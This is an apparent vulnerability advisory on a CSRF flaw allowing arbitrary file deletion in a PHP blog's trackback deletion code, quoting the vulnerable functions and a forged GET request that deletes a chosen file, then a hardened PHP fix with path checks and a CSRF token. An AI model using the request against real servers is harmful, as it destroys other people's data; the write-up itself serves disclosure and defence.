There is a CSRF vulnerability which can lead to file
deletion. Let's see the code of "trackback_delete_cgi.php":
22| if ( array_key_exists( 'trackback', $_GET ) ) {
23| $ok = delete_trackback( $_GET[ 'trackback' ] );
24| }
So if the variable "trackback" is set with the GET method,
the delete_trackback() function is called. The code of
this function is situated in "sb_trackback.php":
229| function delete_trackback ( $entryFile ) {
230| // Delete the old file
231| if ( file_exists( $entryFile ) ) {
232| $ok = sb_delete_file( $entryFile );
233| }
If the file exists, the function sb_delete_file() is called,
with the parameter $_GET['trackback']. The source code
of this function is situated in the file "sb_fileio.php":
171| function sb_delete_file ( $filename ) {
|
175| clearstatcache();
176| if ( file_exists( $filename ) ) {
177| $result = @unlink( $filename );
178| }
There is no verification before deleting the file, so we
can delete any file on the server. The HTTP request sent
by the attacker looks like this:
GET /trackback_delete_cgi.php?trackback=<FILE> HTTP/1.1\r\n
Host: localhost\r\n
Connection: keep-alive\r\n\r\n
Admin rights are needed to delete files, but because there
is also a CRLF vulnerability, we can use it in our XSS, so
admin rights aren't needed for the attacker.
Source: http://archive.cert.uni-stuttgart.de/bugtraq/2007/10/msg00314.html
Fixed in svn r82. delete_trackback will only allow deletion of .txt files in the content dir.
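As an added illustration of what the fix note describes (this is example code written for this page, not the project's own code and not the r82 patch), the following shows a hardened replacement for the delete path. It restricts deletion to a bare ".txt" file name inside the content directory, resolves the path with realpath() so "../" and symlinks cannot escape that directory, and moves the action to a POST request protected by a per-session CSRF token. The names $content_dir, $_SESSION['csrf_token'] and safe_delete_trackback() are assumptions made for the example; the existing admin check is assumed to run before this code, as it does for the original handler.

```php
<?php
// Example code added for this page: not the project's own implementation.
// Assumptions: $content_dir points at the trackback content directory and
// the session holds a random token in $_SESSION['csrf_token'].

function safe_delete_trackback(string $content_dir, string $entryFile): bool
{
    // Accept only a bare file name: no directory separators, no NUL bytes.
    // realpath() would reject NUL bytes anyway, but check explicitly first.
    if ($entryFile === ''
        || $entryFile !== basename($entryFile)
        || strpos($entryFile, "\0") !== false) {
        return false;
    }

    // Only trackback text files may be removed (the fix note's ".txt" rule).
    if (strtolower(substr($entryFile, -4)) !== '.txt') {
        return false;
    }

    $base = realpath($content_dir);
    if ($base === false) {
        return false;
    }

    // realpath() resolves ".." and symlinks; the resolved target must still
    // sit directly under the content directory, otherwise refuse.
    $target = realpath($base . DIRECTORY_SEPARATOR . $entryFile);
    if ($target === false
        || strpos($target, $base . DIRECTORY_SEPARATOR) !== 0
        || dirname($target) !== $base
        || !is_file($target)) {
        return false;
    }

    return unlink($target);
}

// Hardened handler corresponding to trackback_delete_cgi.php (example).
// A state-changing action is only honoured on POST with a valid CSRF token,
// so a forged GET like the one in the advisory does nothing. hash_equals()
// is used so the token comparison is constant-time.
session_start();
$content_dir = __DIR__ . '/content'; // assumed location, see lead-in

if ($_SERVER['REQUEST_METHOD'] === 'POST'
    && isset($_POST['csrf_token'], $_SESSION['csrf_token'], $_POST['trackback'])
    && hash_equals($_SESSION['csrf_token'], (string) $_POST['csrf_token'])) {
    $ok = safe_delete_trackback($content_dir, (string) $_POST['trackback']);
} else {
    $ok = false;
}
```

The form that triggers the deletion must embed the same $_SESSION['csrf_token'] value (generated once per session, e.g. with bin2hex(random_bytes(32))) as a hidden field; without it, even an authenticated admin lured onto an attacker's page cannot be made to delete a file, and no value of the trackback parameter can reach anything outside the content directory.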